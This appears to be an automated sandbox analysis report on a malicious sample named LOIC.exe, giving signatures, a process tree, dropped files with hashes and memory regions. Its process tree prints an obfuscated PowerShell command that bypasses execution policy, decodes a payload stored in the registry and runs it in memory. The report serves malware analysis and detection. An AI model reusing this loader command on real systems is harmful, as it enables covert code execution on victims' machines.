Analysis

  • max time kernel
    1796s
  • max time network
    1798s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15/03/2024, 22:58

General

  • Target

    LOIC.exe

  • Size

    6.1MB

  • MD5

    c54c3a6c2fdf9f9a458f3d552e355848

  • SHA1

    f53c3142902821377c4cfc6a9b32771bfeefe82d

  • SHA256

    ddb156846d1097880cc9ce51240b2b99b34925d420d28eac86f834aa0c92d49d

  • SHA512

    1655de2e409b1d98484bb5010b6a8f5c3f53717e0a5458d074e978386859aed8b8de0983047056a8c243156a3d78c17349d66fdb20fa14ba1a532a0d8af0caae

  • SSDEEP

    98304:31aHm6zKsIOaEABObLI+7dCcYRAzSVdWFOjdSWYj1c6XDm1tc:FgHvL/o0l4dw5cWqe

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 18 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LOIC.exe
    "C:\Users\Admin\AppData\Local\Temp\LOIC.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:32
    • C:\Users\Admin\AppData\Local\Temp\LOIC.exe
      "C:\Users\Admin\AppData\Local\Temp\LOIC.exe"
      2⤵
        PID:5064
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Roaming\F9753A3\LOIC.msi /qn AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\LOIC.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup " ALLUSERS="1"
        2⤵
          PID:204
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3220
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding C18EC5E5BB8CBB0CE9B8499A3F9F8BF4 C
          2⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:5016
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 0A1D76C5839BF5516948D056230DEE09 C
          2⤵
          • Loads dropped DLL
          PID:4120
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding E2BFD4DCD030B7B5D6058EC0C0170E09
          2⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:5004
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 978B6CE11D9C550E06F740035010B1B1 E Global\MSI0000
          2⤵
          • Loads dropped DLL
          PID:424
        • C:\Windows\Installer\MSI82AB.tmp
          "C:\Windows\Installer\MSI82AB.tmp" /DontWait "C:\Program Files (x86)\Common Files\index.js"
          2⤵
          • Executes dropped EXE
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2448
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\Common Files\index.js"
            3⤵
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:3528
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function MXrEbyrFuiEzczn([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK' -name 'FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK').FdcTyogttXjJHJXPbMQXmyjwYSjDdlOcZnjVrotBPWZnXdohrmcQAtppFUjcoyhyyFK;$_b=$_b.replace('CАС','C');[byte[]]$_0 = MXrEbyrFuiEzczn($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
              4⤵
              • Blocklisted process makes network request
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              PID:3628

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Config.Msi\e577b4d.rbs

        Filesize

        180KB

        MD5

        58461e01e759fa6e8d7524dcb1ec9f88

        SHA1

        82c39645840d7c77cf9ce8c4e00d3cc6fe02da96

        SHA256

        4ed153af5f74210ecf8c73ddbf1b5815bf120ea360e713e589d91bb241d16899

        SHA512

        6e820df09ea0b868f94adb2493c1c76ecf2d7a09969901e09d870c863c74d6bd9dac8d6e9c236ef2830b26f7c57387dc02385fce2f86e82fad17f396312fe371

      • C:\Users\Admin\AppData\Local\Temp\MSI74F2.tmp

        Filesize

        379KB

        MD5

        647145b1074e24a0c2bf8998917a8a90

        SHA1

        0c863b05a5599b2c1dd0645e086cda4a9f2fb954

        SHA256

        91933aae899e769f6aa29a3640bf8151e70192aa5d416195b9c69041301101e1

        SHA512

        f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

      • C:\Users\Admin\AppData\Local\Temp\MSI75ED.tmp

        Filesize

        817KB

        MD5

        0b5e646a65d2861e0bce68bb0dc906e2

        SHA1

        f34461a7c9b3e0a9d7460757158c768e6e3e0c1f

        SHA256

        279415ca33496256bf8ce72ff656080586938ec4c298ab8a9ef5c707d6330d2c

        SHA512

        26c3dabcf67fbce97bcccbce4f75a775bbe481c21b908e6db1ae0adef0e16108bc773b56f52ab039f09ac52855b1b79f0844aa3caa4b94ebec530c73a023affb

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5rjn2ki.jgq.ps1

        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      • C:\Users\Admin\AppData\Local\Temp\shi7DDB.tmp

        Filesize

        2.7MB

        MD5

        ebec631150e28e8edeade557a1150fbd

        SHA1

        84da8f7380f63920351a1ac734b226e44007da66

        SHA256

        9e217bd4c7122882fe9ddb70809a251de285d79c5367894f1dadc625012fce46

        SHA512

        93bc6e318f5262d56c5690ab05c7e1c248a8ceae05d0e5946de6e81719243a4776cd1a9e56a5170b37e7eeb2fea3d8d4e797aada1fb44214572a54d754ee041f

      • C:\Users\Admin\AppData\Local\Temp\shi7DEB.tmp

        Filesize

        969KB

        MD5

        8daa0843654de0cc1d40325747ac9f3e

        SHA1

        0727d9e78a371b59499b2a0754956d4a1378b8a7

        SHA256

        d41f00ae17e1e1dbc56826584db3332a33d9b6f25462255404eb9ec37fec45e1

        SHA512

        8381386d9df7a619ab4d188ae45f4415587d55ad74b49d4ce7680d08a3f1702dd750b2ddbc2e03d507b29ef06541fea5d822a2c3968d857d13c2354793f2fa73

      • C:\Users\Admin\AppData\Roaming\F9753A3\LOIC.msi

        Filesize

        1.3MB

        MD5

        c93958327d2d0801e32780587fc4e8de

        SHA1

        f710a17bbc1c5fff729f585dc8319abd37d10a77

        SHA256

        ba30e9b8486128b57af2ba1b06eed6b13115905e94d79f837dd13d0fcbb5d80e

        SHA512

        611e3b92c9be557b9b53dedbff95c15796e1540efdc625ee4d40e120798fc27d73b8bc46d6cb917278dac6660109598d616d64eeb9c0f90c7f73d40de08e8b4a

      • C:\Users\Admin\AppData\Roaming\F9753A3\LOIC.msi

        Filesize

        2.6MB

        MD5

        ace834a84a3d7c617488a79de7c156e0

        SHA1

        24a3c7675aa95cb1081d7d89694d8288e6e87429

        SHA256

        e78a7ceba11ef5ece1f5d74c9a7ffc6a9927c58e2aac996cf18cc05bddbdc8f0

        SHA512

        577be9f4dc2361fd084c86dc2e03c8772c20f2c145fd87b0b2c6dbbfd4d17c66e457f1d4e9176b46f8fd36d93c6930e7abdcf6e25fc323264ee8771a1d8bb2a2

      • C:\Users\Admin\AppData\Roaming\F9753A3\index.js

        Filesize

        1.1MB

        MD5

        ebb2708ed093e9114d54eaffb37a28ab

        SHA1

        266ba3dc516525cd7d88eb03eaab323aa48206a5

        SHA256

        46f909b0d803daaf64c7714d78970dfa815f5c4a970602b3751f23a48c705158

        SHA512

        8c6d58ce8aaaa6eef919ab86932c95e9d04fe4c3952bddb0d84390ae97bd89f91782dfee29d83f12b157e75b85ba1bae4832a7b2e568d7ce97382c0c4a62d70c

      • C:\Windows\Installer\MSI7D51.tmp

        Filesize

        535KB

        MD5

        1b194025c161371d3bcb9b5919278620

        SHA1

        af9edebc182d96e361140670751dd2f7756d92ad

        SHA256

        7aec9b8db15c991f780cd3542b149fc1399118371ccd3bd14341a0c47bf63486

        SHA512

        22ae4a6c80b346d440911f51193c3d456b03db1a26df78d2e7a7f51f6aae52892867c4f03b5bc96a73d7372519f73a60f088c2100cf80a69540b865fe0bf924a

      • C:\Windows\Installer\MSI8054.tmp

        Filesize

        178KB

        MD5

        b87c1c4f36d6fb0a3ccecc6cf72d0bc9

        SHA1

        a32b1780af0392037911ca5d0b7e4caa454e0420

        SHA256

        b75c6be504a92f0d8af3a876a02fce82022899f6d09cc7ca0ade19620965b913

        SHA512

        ccff049e3846352aae7c291a1971c7708dcde01f70c3f161e5c5388b3a1847bc90669266c9f5eba742f4a302192c998a84221a9d51b0eb1de9327031bb26cb4c

      • C:\Windows\Installer\MSI82AB.tmp

        Filesize

        404KB

        MD5

        f49ad35868f72b3fb7b14424795b220d

        SHA1

        67b00730b931741cee9014606237a7d3f95577f5

        SHA256

        5031b53ae252e749dac9f2b0e0cd24d281298d9e8ebe02a36554642fda226ae0

        SHA512

        144b5d1b478f1f741c87395c6ee41bf61b11f3bf2b7cc4606bd71d8b03db340341fc2db989c02404cf4663c0c1039e681a3d0ac7a4ce42e3a56ba1a30d60b7df

      • \Users\Admin\AppData\Roaming\decoder.dll

        Filesize

        182KB

        MD5

        e1a7eedf1c29be164527c93b24f3e971

        SHA1

        0393ab9ccbb5f4ea16d2ab11dca0f733569f925f

        SHA256

        5c60676010275dca6fdc721876bfd067be5d945817bb663f9a7a05f9117f4833

        SHA512

        822a3e917dfcd0999d0d9514043aee0de0e40b163d3a644e424267d9b42b01bb1cf8c22243b5d8a5705a978dae87bd08a474e7a63573c0a56d824c4a1aaf3a58

      • \Windows\Installer\MSI7BF6.tmp

        Filesize

        278KB

        MD5

        8d47d65cffa4aba7364f1b0ae13afaf7

        SHA1

        f1a70cee0f34c2f89e669e4d30ab3077a111dd8c

        SHA256

        25be4de2442a9c50a0f88eec0d953ace453dc12c0efdc4249ab4c6afb5c9fe95

        SHA512

        eda697c66769c51ff86416b213c449e610bd6103e13561365b071f0f230609e2df81f0fd5a9023e06878a6f4620d18cbd6ef41e64b9421728f1072010b0dce50

      • \Windows\Installer\MSI7FD6.tmp

        Filesize

        141KB

        MD5

        b14d92c807c494bb17bab68ab962ef99

        SHA1

        1933465ab727b9db88b4d8a35052b10e0aeca4a9

        SHA256

        49bfc33e832a848e1320a671bd58999ba08a2b3f401317d40261ccdd89cc0fe8

        SHA512

        cdfef6173d1d975c2c8bf61b4ed1a618289a8f688988385745ee8fe3fecc6f078b5f4f219ceac28a13efeb5a47b8c2e305f57adbe543eb03643279bd529db1ef

      • memory/3628-159-0x0000000007700000-0x0000000007766000-memory.dmp

        Filesize

        408KB

      • memory/3628-197-0x0000000008FB0000-0x0000000008FCA000-memory.dmp

        Filesize

        104KB

      • memory/3628-156-0x00000000010D0000-0x00000000010E0000-memory.dmp

        Filesize

        64KB

      • memory/3628-157-0x0000000006F50000-0x0000000007578000-memory.dmp

        Filesize

        6.2MB

      • memory/3628-158-0x0000000007580000-0x00000000075A2000-memory.dmp

        Filesize

        136KB

      • memory/3628-155-0x00000000010D0000-0x00000000010E0000-memory.dmp

        Filesize

        64KB

      • memory/3628-160-0x0000000007870000-0x00000000078D6000-memory.dmp

        Filesize

        408KB

      • memory/3628-161-0x0000000007920000-0x0000000007C70000-memory.dmp

        Filesize

        3.3MB

      • memory/3628-162-0x0000000007CD0000-0x0000000007CEC000-memory.dmp

        Filesize

        112KB

      • memory/3628-163-0x0000000007D40000-0x0000000007D8B000-memory.dmp

        Filesize

        300KB

      • memory/3628-154-0x0000000073FF0000-0x00000000746DE000-memory.dmp

        Filesize

        6.9MB

      • memory/3628-182-0x0000000008180000-0x00000000081BC000-memory.dmp

        Filesize

        240KB

      • memory/3628-191-0x0000000008EE0000-0x0000000008F56000-memory.dmp

        Filesize

        472KB

      • memory/3628-153-0x0000000001070000-0x00000000010A6000-memory.dmp

        Filesize

        216KB

      • memory/3628-196-0x0000000009240000-0x00000000092D4000-memory.dmp

        Filesize

        592KB

      • memory/3628-198-0x0000000009000000-0x0000000009022000-memory.dmp

        Filesize

        136KB

      • memory/3628-199-0x00000000097E0000-0x0000000009CDE000-memory.dmp

        Filesize

        5.0MB

      • memory/3628-201-0x00000000093F0000-0x000000000948C000-memory.dmp

        Filesize

        624KB

      • memory/3628-200-0x0000000006B20000-0x0000000006B2A000-memory.dmp

        Filesize

        40KB

      • memory/3628-206-0x00000000010D0000-0x00000000010E0000-memory.dmp

        Filesize

        64KB

      • memory/3628-211-0x000000000A3E0000-0x000000000AA58000-memory.dmp

        Filesize

        6.5MB

      • memory/3628-228-0x0000000073FF0000-0x00000000746DE000-memory.dmp

        Filesize

        6.9MB

      • memory/3628-240-0x00000000010D0000-0x00000000010E0000-memory.dmp

        Filesize

        64KB

      • memory/3628-251-0x00000000010D0000-0x00000000010E0000-memory.dmp

        Filesize

        64KB

      • memory/3628-262-0x00000000010D0000-0x00000000010E0000-memory.dmp

        Filesize

        64KB